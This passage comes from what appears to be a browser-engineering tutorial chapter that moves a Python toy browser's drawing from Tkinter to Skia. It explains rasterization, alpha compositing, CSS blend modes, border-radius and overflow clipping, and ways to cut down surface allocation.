            - self.font.getMetrics().fAscent
        canvas.drawString(self.text, float(self.left), baseline,
            self.font, paint)
Finally, for drawing rectangles you use drawRect
.
Filling in the rectangle is the default:
class DrawRect:
    def execute(self, scroll, canvas):
        paint = skia.Paint()
        paint.setColor(parse_color(self.color))
        canvas.drawRect(self.rect.makeOffset(0, -scroll), paint)
Here the rect
field is a Skia Rect
object,
which you can construct using MakeLTRB
(for “make
left-top-right-bottom”) or MakeXYWH
(for “make
x-y-width-height”):
class DrawRect:
    def __init__(self, x1, y1, x2, y2, color):
        self.rect = skia.Rect.MakeLTRB(x1, y1, x2, y2)
        # ...
To draw just the outline, set the Style
parameter of the
Paint
to Stroke_Style
. Here “stroke” is a
standard term referring to drawing along the border of some shape; the
opposite is “fill”, meaning filling in the interior of the shape:
class DrawOutline:
    def execute(self, scroll, canvas):
        paint = skia.Paint()
        paint.setStyle(skia.Paint.kStroke_Style)
        paint.setStrokeWidth(self.thickness)
        paint.setColor(parse_color(self.color))
        canvas.drawRect(self.rect.makeOffset(0, -scroll), paint)
If you look at the details of these helper methods, you’ll see that
they all use a Skia Paint
object to describe a shape’s
borders and colors. We’ll be seeing a lot more features of
Paint
in this chapter.
While we’re here, let’s also add a rect
field to the other drawing commands, replacing their top
, left
, bottom
, and right
fields. (You’ll probably
need some font changes in the browser UI, because Skia draws fonts a bit
differently from Tkinter. I had to adjust the y position of the
plus sign and less than signs to keep them centered in their boxes. Feel
free to adjust to make everything look good on your
system.)
class DrawText:
    def __init__(self, x1, y1, text, font, color):
        # ...
        self.rect = \
            skia.Rect.MakeLTRB(x1, y1, self.right, self.bottom)

class DrawLine:
    def __init__(self, x1, y1, x2, y2, color, thickness):
        # ...
        self.rect = skia.Rect.MakeLTRB(x1, y1, x2, y2)
Since we’re replacing Tkinter with Skia, we are also replacing
tkinter.font
. In Skia, a font object has two pieces: a
Typeface
, which is a type family with a certain weight,
style, and width; and a Font
, which is a
Typeface
at a particular size. It’s the
Typeface
that contains data and caches, so that’s what we
need to cache:
def get_font(size, weight, style):
    key = (weight, style)
    if key not in FONTS:
        if weight == "bold":
            skia_weight = skia.FontStyle.kBold_Weight
        else:
            skia_weight = skia.FontStyle.kNormal_Weight
        if style == "italic":
            skia_style = skia.FontStyle.kItalic_Slant
        else:
            skia_style = skia.FontStyle.kUpright_Slant
        skia_width = skia.FontStyle.kNormal_Width
        style_info = \
            skia.FontStyle(skia_weight, skia_width, skia_style)
        font = skia.Typeface('Arial', style_info)
        FONTS[key] = font
    return skia.Font(FONTS[key], size)
Our browser also needs font metrics and measurements. In Skia, these
are provided by the measureText
and getMetrics
methods. Let’s start with measureText
, replacing all calls
to measure
. For example, in the paint
method
for an InputLayout
, we must do:
class InputLayout:
    def paint(self, display_list):
        if self.node.is_focused:
            cx = self.x + self.font.measureText(text)
            # ...
There are also measure
calls in DrawText
, in the draw
method on Browser
, in the text
method in BlockLayout
, and in the layout
method in TextLayout
. Update all of them to use measureText
.
Also, in the layout
method of LineLayout
and in DrawText
we make calls to the metrics
method on fonts. In Skia, this method is called getMetrics
, and to get the ascent and descent we use
-font.getMetrics().fAscent
and font.getMetrics().fDescent
. Note the negative sign when accessing the ascent: in Skia, ascent and
descent are positive if they go downward and negative if they go upward,
so ascents will normally be negative, the opposite of Tkinter. There’s
no analog for the linespace
field that Tkinter provides,
but you can use descent minus ascent instead:

def linespace(font):
    metrics = font.getMetrics()
    return metrics.fDescent - metrics.fAscent
You should now be able to run the browser again. It should look and behave just as it did in previous chapters, and it’ll probably feel faster, because Skia and SDL are faster than Tkinter. This is one advantage of Skia: since it is also used by the Chromium browser, we know it has fast, built-in support for all of the shapes we might need. And if the transition felt easy—well, that’s one of the benefits to abstracting over the drawing backend using a display list!
Font rasterization is surprisingly deep, with techniques such as subpixel rendering and hinting used to make fonts look better on lower-resolution screens. These techniques are much less necessary on high-pixel-density screens, though. It’s likely that eventually, all screens will be high-density enough to retire these techniques.
Let’s reward ourselves for the big refactor with a simple feature
that Skia enables: rounded corners of a rectangle via the
border-radius
CSS property, like this:
<div style="border-radius: 10px; background: lightblue">
This is some example text.
</div>
Which looks like this (if you’re very observant, you may notice that
the text here protrudes past the background by just a handful of
pixels; this is the correct default behavior, and can be modified by
the overflow
CSS property, which we’ll see later this chapter):
This is some example text.
Implementing border-radius
requires drawing a rounded
rectangle, so let’s add a new DrawRRect
command:
class DrawRRect:
    def __init__(self, rect, radius, color):
        self.rect = rect
        self.rrect = skia.RRect.MakeRectXY(rect, radius, radius)
        self.color = color

    def execute(self, scroll, canvas):
        sk_color = parse_color(self.color)
        canvas.drawRRect(self.rrect,
            paint=skia.Paint(Color=sk_color))
Note that Skia supports RRect
s, or rounded rectangles,
natively, so we can just draw one right to a canvas. Now we can draw
these rounded rectangles for the background:
class BlockLayout:
    def paint(self, display_list):
        if not is_atomic:
            if bgcolor != "transparent":
                radius = float(
                    self.node.style.get("border-radius", "0px")[:-2])
                display_list.append(DrawRRect(rect, radius, bgcolor))
Similar changes should be made to InputLayout
.
Implementing high-quality raster libraries is very interesting in its own right—check out Real-Time Rendering for more. There is also Computer Graphics: Principles and Practice, which incidentally I remember buying—this is Chris speaking—back in the days of my youth (1992 or so). At the time I didn’t get much further than rastering lines and polygons (in assembly language!). These days you can do the same and more with Skia and a few lines of Python, and it’s especially important to leverage GPUs when they’re available; browsers often push the envelope here. Browser teams typically include or work closely with raster library experts: Skia for Chromium and Core Graphics for WebKit, for example. Both of these libraries are used outside of the browser, too: Core Graphics in iOS and macOS, and Skia in Android.
Skia, like the Tkinter canvas we’ve been using until now, is a rasterization library: it converts shapes like rectangles and text into pixels. Before we move on to Skia’s advanced features, let’s talk about how rasterization works at a deeper level. This will help to understand how exactly those features work.
You probably already know that computer screens are a 2D array of pixels. Each pixel contains red, green and blue lights,Actually, some screens contain pixels besides red, green, and blue, including white, cyan, or yellow. Moreover, different screens can use slightly different reds, greens, or blues; professional color designers typically have to calibrate their screen to display colors accurately. For the rest of us, the software still communicates with the display in terms of standard red, green, and blue colors, and the display hardware converts to whatever pixels it uses. or color channels, that can shine with an intensity between 0 (off) and 1 (fully on). By mixing red, green, and blue, which is formally known as the sRGB color space, any color in that space’s gamut can be made.The sRGB color space dates back to CRT displays. New technologies like LCD, LED, and OLED can display more colors, so CSS now includes syntax for expressing these new colors. All color spaces have a limited gamut of expressible colors. In a rasterization library, a 2D array of pixels like this is called a surface.Sometimes they are called bitmaps or textures as well, but these words connote specific CPU or GPU technologies for implementing surfaces. Since modern devices have lots of pixels, surfaces require a lot of memory, and we’ll typically want to create as few as possible.
The job of a rasterization library is to determine the red, green, and blue intensity of each pixel on the screen, based on the shapes—lines, rectangles, text—that the application wants to display. The interface for drawing shapes onto a surface is called a canvas; both Tkinter and Skia had canvas APIs. In Skia, each surface has an associated canvas that draws to that surface.
Screens use red, green, and blue color channels to match the three types of cone cells in a human eye. We take it for granted, but color standards like CIELAB derive from attempts to reverse-engineer human vision. These cone cells vary between people: some have more or fewer (typically an inherited condition carried on the X chromosome). Moreover, different people have different ratios of cone types and those cone types use different protein structures that vary in the exact frequency of green, red, and blue that they respond to. The study of color thus combines software, hardware, chemistry, biology, and psychology.
Drawing shapes quickly is already a challenge, but with multiple shapes there’s an additional question: what color should the pixel be when two shapes overlap? So far, our browser has only handled opaque shapes,It also hasn’t considered subpixel geometry or anti-aliasing, which also rely on color mixing. and the answer has been simple: take the color of the top shape. But now we need more nuance.
Many objects in nature are partially transparent: frosted glass, clouds, or colored paper, for example. Looking through one, you see multiple colors blended together. That’s also why computer screens work: the red, green, and blue lights blend together and appear to our eyes as another color. Designers use this effectMostly. Some more advanced blending modes on the web are difficult, or perhaps impossible, in real-world physics. in overlays, shadows, and tooltips, so our browser needs to support color mixing.
Color mixing means we need to think carefully about the order of operations. For example, consider black text on an orange background, placed semi-transparently over a white background. The text is gray while the background is yellow-orange. That’s due to blending: the text and the background are both partially transparent and let through some of the underlying white:
But importantly, the text isn’t orange-gray: even though the text is partially transparent, none of the orange shines through. That’s because the order matters: the text is first blended with the background; since the text is opaque, its blended pixels are black and overwrite the orange background. Only then is this black-and-orange image blended with the white background. Doing the operations in a different order would lead to dark-orange or black text.
To handle this properly, browsers apply blending not to individual shapes but to a tree of stacking contexts. Conceptually, each stacking context is drawn onto its own surface, and then blended into its parent stacking context. Rastering a web page requires a bottom-up traversal of the tree of stacking contexts: to raster a stacking context you first need to raster its contents, including its child stacking contexts, and then the whole contents need to be blended together into the parent.
To match this use pattern, in Skia, surfaces form a stack. You can push a new surface on the stack, raster things to it, and then pop it off by blending it with the surface below. When traversing the tree of stacking contexts, you push a new surface onto the stack every time you recurse into a new stacking context, and pop-and-blend every time you return from a child stacking context to its parent.
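As a minimal sketch of that push/raster/pop-and-blend pattern (illustration only, not browser code: plain lists stand in for surfaces, and "blending" is just concatenation), a bottom-up traversal might look like this:

```python
def raster(context, stack):
    stack.append([])                   # push a fresh surface for this context
    stack[-1].append(context["name"])  # raster this context's own content
    for child in context.get("children", []):
        raster(child, stack)           # recurse into child stacking contexts
    done = stack.pop()                 # pop this context's surface...
    stack[-1].extend(done)             # ...and blend it into the parent

tree = {"name": "root",
        "children": [{"name": "child"}, {"name": "sibling"}]}
stack = [[]]  # the root "screen" surface
raster(tree, stack)
print(stack[0])  # ['root', 'child', 'sibling']
```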
In real browsers, stacking contexts are formed by HTML elements with certain styles, up to any descendants that themselves have such styles. The full definition is actually quite complicated, so in this chapter we’ll simplify by treating every layout object as a stacking context.
Mostly, elements form a stacking context because of CSS properties
that have something to do with layering (like z-index
) or visual effects (like mix-blend-mode
). On the other hand, the overflow
property, which can make an element scrollable, does not induce a
stacking context, which I think was a mistake. (While we’re at it,
perhaps scrollable elements should also be a containing block for
descendants. Otherwise, a scrollable element can have non-scrolling
children via properties like position
. This situation is very complicated to handle in real browsers.)
The reason is that inside a modern browser, scrolling is done on the GPU
by offsetting two surfaces. Without a stacking context the browser might
(depending on the web page structure) have to move around multiple
independent surfaces with complex paint orders, in lockstep, to achieve
scrolling. Fixed- and sticky-positioned elements also form stacking
contexts because of their interaction with scrolling.
Color mixing happens when multiple page elements overlap. The easiest
way that happens in our browser is child elements overlapping their
parents, like this (there are many more ways elements can overlap in a
real browser: the transform
property, position
ed elements, negative margins, and so many more, but color mixing
works the same way each time):
<div style="background-color:orange">
  Parent
  <div style="background-color:white;border-radius:5px">Child</div>
  Parent
</div>
It looks like this:
Parent
Right now, the white rectangle completely obscures part of the orange
one; the two colors don’t really need to “mix”, and in fact it kind of
looks like two orange rectangles instead of an orange rectangle with a
white one on top. Now let’s make the white child element
semi-transparent, so the colors have to mix. In CSS, that requires
adding an opacity
property with a value somewhere between 0
(completely transparent) and 1 (totally opaque). With 50% opacity on the
white child element, it looks like this:
Parent
Notice that instead of being pure white, the child element now has a light-orange background color, resulting from orange and white mixing. Let’s implement this in our browser.
The way to mix colors in Skia is to first create two surfaces, and
then draw one into the other. The most convenient way to do that is
with saveLayer
and restore
. (It’s called saveLayer
instead of createSurface
because Skia doesn’t actually promise to create a new surface, if it
can optimize that away. So what you’re really doing with saveLayer
is telling Skia that there is a new conceptual layer, or “piece of
paper”, on the stack. Skia’s terminology distinguishes between a layer
and a surface for this reason as well, but for our purposes it makes
sense to assume that each new layer comes with a surface.)
# draw parent
canvas.saveLayer(paint=skia.Paint(Alphaf=0.5))
# draw child
canvas.restore()
We first draw the parent, then create a new surface with
saveLayer
to draw the child into, and then when the
restore
call is made the paint
parameters
passed into saveLayer
are used to mix the colors in the two
surfaces together. Here we’re using the Alphaf
parameter,
which describes the opacity as a floating-point number from 0 to 1.
Note that saveLayer
and restore
are like a
pair of parentheses enclosing the child drawing operations. This means
our display list is no longer just a linear sequence of drawing
operations, but a tree. So in our display list, let’s represent
saveLayer
with a SaveLayer
command that takes
a sequence of other drawing commands as an argument:
class SaveLayer:
    def __init__(self, sk_paint, children):
        self.sk_paint = sk_paint
        self.children = children
        self.rect = skia.Rect.MakeEmpty()
        for cmd in self.children:
            self.rect.join(cmd.rect)

    def execute(self, scroll, canvas):
        canvas.saveLayer(paint=self.sk_paint)
        for cmd in self.children:
            cmd.execute(scroll, canvas)
        canvas.restore()
Now let’s look at how we can add this to our existing
paint
method for BlockLayout
s. Right now, this
method draws a background and then recurses into its children, adding
each drawing command straight to the global display list. Let’s instead
add those drawing commands to a temporary list first:
class BlockLayout:
    def paint(self, display_list):
        cmds = []
        # ...
        if bgcolor != "transparent":
            # ...
            cmds.append(DrawRRect(rect, radius, bgcolor))
        for child in self.children:
            child.paint(cmds)
        # ...
        display_list.extend(cmds)
Now, before we add our temporary command list to the overall
display list, we can use SaveLayer
to add transparency to
the whole element. I’m going to do this in a new
paint_visual_effects
method, because we’ll want to make the
same changes to all of our other layout objects:
class BlockLayout:
    def paint(self, display_list):
        # ...
        cmds = paint_visual_effects(self.node, cmds, rect)
        display_list.extend(cmds)
Inside paint_visual_effects
, we’ll parse the opacity
value and construct the appropriate SaveLayer
:
def paint_visual_effects(node, cmds, rect):
    opacity = float(node.style.get("opacity", "1.0"))

    return [
        SaveLayer(skia.Paint(Alphaf=opacity), cmds),
    ]
Note that paint_visual_effects
receives a list of
commands and returns another list of commands. It’s just that the output
list is always a single SaveLayer
command that wraps the
original content—which makes sense, because first we need to draw the
commands to a surface, and then apply transparency to it when
blending into the parent.
This blog post gives a really nice visual overview of many of the same concepts explored in this chapter, plus way more content about how a library such as Skia might implement features like raster sampling of vector graphics for lines and text, and interpolation of surfaces when their pixel arrays don’t match resolution or orientation. I highly recommend it.
Now let’s pause and explore how opacity actually works under the hood. Skia, SDL, and many other color libraries account for opacity with a fourth alpha value for each pixel.The difference between opacity and alpha can be confusing: think of opacity as a visual effect applied to content, and alpha as part of the content itself, an implementation technique for representing opacity. An alpha of 0 means the pixel is fully transparent (no matter what its colors are, you can’t see them), and an alpha of 1 means the pixel is fully opaque.
When a pixel with alpha overlaps another pixel, the final color is a
mix of their two colors. How exactly the colors are mixed is defined by
Skia’s Paint
objects. Of course, Skia is pretty complex,
but we can sketch these paint operations in Python as methods on an
imaginary Pixel
class.
class Pixel:
    def __init__(self, r, g, b, a):
        self.r = r
        self.g = g
        self.b = b
        self.a = a
When we apply a Paint
with an Alphaf
parameter, the first thing Skia does is add the requested opacity to
each pixel:
class Pixel:
    def alphaf(self, opacity):
        self.a = self.a * opacity
I want to emphasize that this code is not a part of our browser—I’m simply using Python code to illustrate what Skia is doing internally.
That Alphaf
operation applies to pixels in one surface.
But with SaveLayer
we will end up with two surfaces, with
all of their pixels aligned, and therefore we will need to combine, or
blend, corresponding pairs of pixels.
Here the terminology can get confusing: we imagine that the pixels “on top” are blending into the pixels “below”, so we call the top surface the source surface, with source pixels, and the bottom surface the destination surface, with destination pixels. When we combine them, there are lots of ways we could do it, but the default on the web is called “simple alpha compositing” or source-over compositing. In Python, the code to implement it looks like this:The formula for this code can be found here. Note that that page refers to premultiplied alpha colors, but Skia’s API does not use premultiplied representations, and the code below doesn’t either.
class Pixel:
    def source_over(self, source):
        new_a = 1 - (1 - source.a) * (1 - self.a)
        if new_a == 0: return self
        self.r = \
            (self.r * (1 - source.a) * self.a + \
             source.r * source.a) / new_a
        self.g = \
            (self.g * (1 - source.a) * self.a + \
             source.g * source.a) / new_a
        self.b = \
            (self.b * (1 - source.a) * self.a + \
             source.b * source.a) / new_a
        self.a = new_a
Here the destination pixel self
is modified to blend in
the source pixel source
. The mathematical expressions for
the red, green, and blue color channels are identical, and basically
average the source and destination colors, weighted by alpha.For example, if the alpha of
the source pixel is 1, the result is just the source pixel color, and if
it is 0 the result is the backdrop pixel color. You might
imagine the overall operation of SaveLayer
with an
Alphaf
parameter as something like this:In reality, reading individual
pixels into memory to manipulate them like this is slow. So libraries
such as Skia don’t make it convenient to do so. (Skia canvases do have
peekPixels
and readPixels
methods that are
sometimes used, but not for this.)
for (x, y) in destination.coordinates():
    source[x, y].alphaf(opacity)
    destination[x, y].source_over(source[x, y])
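As a sanity check of that formula (illustration only, with pixels as plain tuples rather than the Pixel class), here is the earlier example computed by hand: 50%-transparent white over opaque orange yields the light orange we saw:

```python
def source_over(dst, src):
    # dst and src are (r, g, b, a) tuples; same math as Pixel.source_over.
    (dr, dg, db, da) = dst
    (sr, sg, sb, sa) = src
    new_a = 1 - (1 - sa) * (1 - da)
    if new_a == 0: return (0, 0, 0, 0)
    def blend(d, s):
        return (d * (1 - sa) * da + s * sa) / new_a
    return (blend(dr, sr), blend(dg, sg), blend(db, sb), new_a)

orange = (1, 0.65, 0, 1)   # opaque orange backdrop
white50 = (1, 1, 1, 0.5)   # 50%-transparent white on top
print(source_over(orange, white50))  # roughly (1.0, 0.825, 0.5, 1.0)
```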
Source-over compositing is one way to combine two pixel values. But it’s not the only method—you could write literally any computation that combines two pixel values if you wanted. Two computations that produce interesting effects are traditionally called “multiply” and “difference” and use simple mathematical operations. “Multiply” multiplies the color values:
class Pixel:
    def multiply(self, source):
        self.r = self.r * source.r
        self.g = self.g * source.g
        self.b = self.b * source.b
And “difference” computes their absolute differences:
class Pixel:
    def difference(self, source):
        self.r = abs(self.r - source.r)
        self.g = abs(self.g - source.g)
        self.b = abs(self.b - source.b)
CSS supports these and many other blending modes (many of these
blending modes are common to other graphics editing programs like
Photoshop and GIMP; some, like “dodge” and “burn”, go back to analog
photography, where photographers would expose some parts of the image
more than others to manipulate their brightness) via the
mix-blend-mode
property, like this:
<div style="background-color:orange">
  Parent
  <div style="background-color:blue;mix-blend-mode:difference">
    Child
  </div>
  Parent
</div>
This HTML will look like:
Parent
Here, when blue overlaps with orange, we see pink: blue has (red,
green, blue) color channels of (0, 0, 1)
, and orange has
(1, .65, 0)
, so with “difference” blending the resulting
pixel will be (1, 0.65, 1)
, which is pink. On a pixel
level, what’s happening is something like this:
for (x, y) in destination.coordinates():
    source[x, y].alphaf(opacity)
    source[x, y].difference(destination[x, y])
    destination[x, y].source_over(source[x, y])
This looks weird, but conceptually it blends the destination into the source (which ignores alpha) and then draws the source over the destination (with alpha considered). In some sense, blending thus happens twice.
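As a quick check of the blue-over-orange arithmetic (illustration only, with colors as plain tuples):

```python
def difference(src, dst):
    # Per-channel absolute difference, as in Pixel.difference above.
    return tuple(abs(s - d) for s, d in zip(src, dst))

blue = (0, 0, 1)
orange = (1, 0.65, 0)
print(difference(blue, orange))  # (1, 0.65, 1), i.e. pink
```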
Skia supports the multiply and difference blend modes natively:
def parse_blend_mode(blend_mode_str):
    if blend_mode_str == "multiply":
        return skia.BlendMode.kMultiply
    elif blend_mode_str == "difference":
        return skia.BlendMode.kDifference
    else:
        return skia.BlendMode.kSrcOver
This makes adding support for blend modes to our browser as simple as
passing the BlendMode
parameter to the Paint
object:
def paint_visual_effects(node, cmds, rect):
    # ...
    blend_mode = parse_blend_mode(node.style.get("mix-blend-mode"))

    return [
        SaveLayer(skia.Paint(BlendMode=blend_mode), [
            SaveLayer(skia.Paint(Alphaf=opacity), cmds),
        ]),
    ]
Note the order of operations here: we first apply
transparency, and then blend the result into the rest of the
page. If we switched the two SaveLayer
calls, so that we
first applied blending, there wouldn’t be anything to blend it into!
Alpha might seem intuitive, but it’s less obvious than you think:
see, for example, this history of
alpha written by its co-inventor (and co-founder of Pixar). And
there are several different implementation options. For example, many
graphics libraries, Skia included, multiply the color channels by the
opacity instead of allocating a whole color channel. This premultiplied
representation is generally more efficient; for example,
source_over
above had to divide by self.a
at
the end, because otherwise the result would be premultiplied. Using a
premultiplied representation throughout would save a division. Nor is it
obvious how alpha behaves when
resized.
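To make the premultiplied idea concrete, here is a sketch (illustration only, not Skia's actual code): with each channel stored already multiplied by its alpha, source-over needs no division at the end, and the 50%-white-over-orange example gives the same result as before:

```python
def source_over_premul(dst, src):
    # Pixels are (r*a, g*a, b*a, a): all four channels use the same
    # formula, and there is no divide at the end.
    sa = src[3]
    return tuple(s + d * (1 - sa) for s, d in zip(src, dst))

orange = (1.0, 0.65, 0.0, 1.0)   # opaque orange, premultiplied
white50 = (0.5, 0.5, 0.5, 0.5)   # 50%-alpha white, premultiplied
print(source_over_premul(orange, white50))  # roughly (1.0, 0.825, 0.5, 1.0)
```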
The “multiply” and “difference” blend modes can seem kind of obscure, but blend modes are a flexible way to implement per-pixel operations. One common use case is clipping—intersecting a surface with a given shape. It’s called clipping because it’s like putting a second piece of paper (called a mask) over the first one, and then using scissors to cut along the mask’s edge.
There are all sorts of powerful methods for clipping content on the
web (the CSS clip-path
property lets you specify a mask shape using a curve, while the
mask
property lets you instead specify an image URL for the mask), but the
most common form involves the overflow
property. This property has lots of possible values (for example,
overflow: scroll
adds scroll bars and makes an element scrollable, while
overflow: hidden
is similar to but subtly different from overflow: clip
), but let’s focus here on overflow: clip
, which cuts off contents of an element that are outside the
element’s bounds.
Usually, overflow: clip
is used with properties like
height
or rotate
which can make an element’s
children poke outside their parent. Our browser doesn’t support these,
but there is one edge case where overflow: clip
is
relevant: rounded corners. Consider this example:
<div
style="border-radius:30px;background-color:lightblue;overflow:clip">
This test text exists here to ensure that the "div" element is
large enough that the border radius is obvious.</div>
That HTML looks like this:
This test text exists here to ensure that the “div” element is large enough that the border radius is obvious.
Observe that the letters near the corner are cut off to maintain a sharp rounded edge. (Uhh… actually, at the time of this writing, Safari does not support overflow: clip, so if you’re using Safari you won’t see this effect. The similar overflow: hidden is supported by all browsers. However, in this case, overflow: hidden will also increase the height of the div until the rounded corners no longer clip out the text. This is because overflow: hidden has different rules for sizing boxes, having to do with the possibility of the child content being scrolled—hidden means “clipped, but might be scrolled by JavaScript”. If the blue box had not been taller, then it would have been impossible to see the text, which is really bad if it’s intended that there should be a way to scroll it on-screen.) That’s clipping; without the overflow: clip property these letters would instead be fully drawn, like we saw earlier in this chapter.
Counterintuitively, we’ll implement clipping using blending modes. We’ll make a new surface (the mask), draw a rounded rectangle into it, and then blend it with the element contents. But we want to see the element contents, not the mask, so when we do this blending we will use destination-in compositing.
Destination-in compositing basically means keeping the pixels of the destination surface that intersect with the source surface. The source surface’s color is not used—just its alpha. In our case, the source surface is the rounded rectangle mask and the destination surface is the content we want to clip, so destination-in fits perfectly. In code, destination-in looks like this:
class Pixel:
    def destination_in(self, source):
        self.a = self.a * source.a
        if self.a == 0: return self
        self.r = (self.r * self.a * source.a) / self.a
        self.g = (self.g * self.a * source.a) / self.a
        self.b = (self.b * self.a * source.a) / self.a
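To make the arithmetic concrete, here is a stripped-down, alpha-only sketch of destination-in compositing. (This simplified Pixel class is ours, written just for illustration; it tracks only the alpha channel, since the source’s color channels are ignored anyway.)

```python
# Alpha-only sketch of destination-in compositing: keep the destination
# pixel only to the extent that the source (mask) pixel is opaque.
class AlphaPixel:
    def __init__(self, a):
        self.a = a

    def destination_in(self, source):
        # Result alpha is the product of the two alphas; the source's
        # color is never consulted, only its alpha.
        self.a = self.a * source.a
        return self

content = AlphaPixel(1.0)        # destination: fully opaque content
mask = AlphaPixel(0.0)           # source: transparent mask pixel (outside the rounded rect)
content.destination_in(mask)
print(content.a)                 # 0.0: the content is clipped out here
```

Where the mask is opaque (alpha 1.0), the content’s alpha is unchanged, which is exactly the “scissors” behavior described above.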
Now, in paint_visual_effects
, we need to create a new
layer, draw the mask image into it, and then blend it with the element
contents with destination-in blending:
def paint_visual_effects(node, cmds, rect):
    # ...
    border_radius = float(node.style.get("border-radius", "0px")[:-2])
    if node.style.get("overflow", "visible") == "clip":
        clip_radius = border_radius
    else:
        clip_radius = 0

    return [
        SaveLayer(skia.Paint(BlendMode=blend_mode), [
            SaveLayer(skia.Paint(Alphaf=opacity), cmds),
            SaveLayer(skia.Paint(BlendMode=skia.BlendMode.kDstIn), [
                DrawRRect(rect, clip_radius, "white")
            ]),
        ]),
    ]
After drawing all of the element contents with cmds
(and
applying opacity), this code draws a rounded rectangle on another layer
to serve as the mask, and uses destination-in blending to clip the
element contents. Here I chose to draw the rounded rectangle in white,
but the color doesn’t matter as long as it’s opaque. On the other hand,
if there’s no clipping, I don’t round the corners of the mask, which
means nothing is clipped out.
Notice how similar this masking technique is to the physical analogy with scissors described earlier, with the two layers playing the role of two sheets of paper and destination-in compositing playing the role of the scissors. This implementation technique for clipping is called masking, and it is very general—you can use it with arbitrarily complex mask shapes, like text, bitmap images, or anything else you can imagine.
Rounded corners have an interesting
history in computing. Features that are simple today were very
complex to implement on early personal computers with limited memory
and no hardware floating-point arithmetic. Even when floating-point
hardware and eventually GPUs became standard, the
border-radius
CSS property didn’t appear in browsers until
around 2010. (The lack of support didn’t stop web developers from putting rounded corners on their sites before border-radius was supported. There are a number of clever ways to do it; this video walks through several.) More recently, the introduction of animations, visual effects, multi-process compositing, and hardware overlays have again made rounded corners pretty complex. The clipRRect fast path, for example, can fail to apply for cases such as hardware video overlays and nested rounded corner clips.
Our browser now works correctly, but uses way too many surfaces. For example, for a single, no-effects-needed div with some text content, there are currently 18 surfaces allocated in the display list. If there’s no blending going on, we should only need one!
Let’s review all the surfaces that our code can create for an element: one to isolate its blend mode, one to apply opacity, and one for the rounded-rectangle mask used in clipping.
But not every element has opacity, blend modes, or clipping applied,
and we could skip creating those surfaces most of the time. To implement
this without making the code hard to read, let’s change
SaveLayer
to take two additional optional parameters:
should_save
and should_paint_cmds
. These
control whether saveLayer
is called and whether subcommands
are actually painted:
class SaveLayer:
    def __init__(self, sk_paint, children,
            should_save=True, should_paint_cmds=True):
        self.should_save = should_save
        self.should_paint_cmds = should_paint_cmds
        # ...

    def execute(self, canvas):
        if self.should_save:
            canvas.saveLayer(paint=self.sk_paint)
        if self.should_paint_cmds:
            for cmd in self.children:
                cmd.execute(canvas)
        if self.should_save:
            canvas.restore()
Turn off those parameters if an effect isn’t applied:
def paint_visual_effects(node, cmds, rect):
    # ...
    needs_clip = node.style.get("overflow", "visible") == "clip"
    needs_blend_isolation = blend_mode != skia.BlendMode.kSrcOver or \
        needs_clip
    needs_opacity = opacity != 1.0

    return [
        SaveLayer(skia.Paint(BlendMode=blend_mode), [
            SaveLayer(skia.Paint(Alphaf=opacity), cmds,
                should_save=needs_opacity),
            SaveLayer(skia.Paint(BlendMode=skia.BlendMode.kDstIn), [
                DrawRRect(rect, clip_radius, "white")
            ], should_save=needs_clip, should_paint_cmds=needs_clip),
        ], should_save=needs_blend_isolation),
    ]
Now simple web pages always use a single surface—a huge saving in memory. But we can save even more surfaces. For example, what if there is a blend mode and opacity at the same time: can we use the same surface? Indeed, yes you can! That’s also pretty simple. (This works for opacity, but not for filters that “move pixels” such as blur. Such a filter needs to be applied before clipping, not when blending into the parent surface. Otherwise, the edge of the blur will not be sharp.)
def paint_visual_effects(node, cmds, rect):
    # ...
    needs_clip = node.style.get("overflow", "visible") == "clip"
    needs_blend_isolation = blend_mode != skia.BlendMode.kSrcOver or \
        needs_clip
    needs_opacity = opacity != 1.0

    return [
        SaveLayer(skia.Paint(BlendMode=blend_mode, Alphaf=opacity),
            cmds + [
                SaveLayer(skia.Paint(BlendMode=skia.BlendMode.kDstIn), [
                    DrawRRect(rect, clip_radius, "white")
                ], should_save=needs_clip, should_paint_cmds=needs_clip),
            ], should_save=needs_blend_isolation or needs_opacity),
    ]
There’s one more optimization to make: using Skia’s
clipRRect
operation to get rid of the destination-in
blended surface. This operation takes in a rounded rectangle and changes
the canvas state so that all future commands skip drawing any
pixels outside that rounded rectangle.
There are multiple advantages to using clipRRect over an explicit destination-in surface. First, most of the time, it allows Skia to avoid making a surface for the mask. (Typically in a browser this means code in GPU shaders. GPU programs are out of scope for this book, but if you’re curious there are many online resources describing ways to do this.) It also allows Skia to skip draw operations that don’t intersect the mask, or dynamically draw only the parts of operations that intersect it. It’s basically the optimization we implemented for scrolling in Chapter 2. (This kind of code is complex for Skia to implement, so it only makes sense to do it for common patterns, like rounded rectangles. This is why Skia only supports optimized clips for a few common shapes.)
Since clipRRect
changes the canvas state, we’ll need to
restore it once we’re done with clipping. That uses the
save
and restore
methods—you call
save
before calling clipRRect
, and
restore
after finishing drawing the commands that should be
clipped:
# Draw commands that should not be clipped.
canvas.save()
canvas.clipRRect(rounded_rect)
# Draw commands that should be clipped.
canvas.restore()
# Draw commands that should not be clipped.
If you’ve noticed that restore is used to undo both saved states and pushed surfaces, that’s because Skia has a combined stack of surfaces and canvas states. Unlike saveLayer, however, save never creates a new surface.
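A toy model of that combined state stack may help. (The ToyCanvas class below is purely illustrative; real Skia tracks far more state than a single clip, and its stack also holds surfaces.)

```python
# Toy model of a canvas state stack: save() pushes the current state,
# restore() pops it back, and nothing here allocates a surface.
class ToyCanvas:
    def __init__(self):
        self.clip = None    # current clip shape, or None for "no clip"
        self.stack = []     # saved states

    def save(self):
        self.stack.append(self.clip)

    def clip_rect(self, rect):
        self.clip = rect

    def restore(self):
        self.clip = self.stack.pop()

canvas = ToyCanvas()
canvas.save()
canvas.clip_rect((0, 0, 100, 100))
# ... commands drawn here would be clipped to that rectangle ...
canvas.restore()
print(canvas.clip)  # None: the clip is undone once restore runs
```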
Let’s wrap this pattern into a ClipRRect drawing command, which like SaveLayer takes a list of subcommands and a should_clip parameter indicating whether the clip is necessary. (If you’re doing two clips at once, or a clip and a transform, or some other more complex setup that would benefit from only saving once but doing multiple things inside it, this pattern of always saving canvas parameters might be wasteful, but since it doesn’t create a surface it’s still a big optimization here.)
class ClipRRect:
    def __init__(self, rect, radius, children, should_clip=True):
        self.rect = rect
        self.rrect = skia.RRect.MakeRectXY(rect, radius, radius)
        self.children = children
        self.should_clip = should_clip

    def execute(self, canvas):
        if self.should_clip:
            canvas.save()
            canvas.clipRRect(self.rrect)
        for cmd in self.children:
            cmd.execute(canvas)
        if self.should_clip:
            canvas.restore()
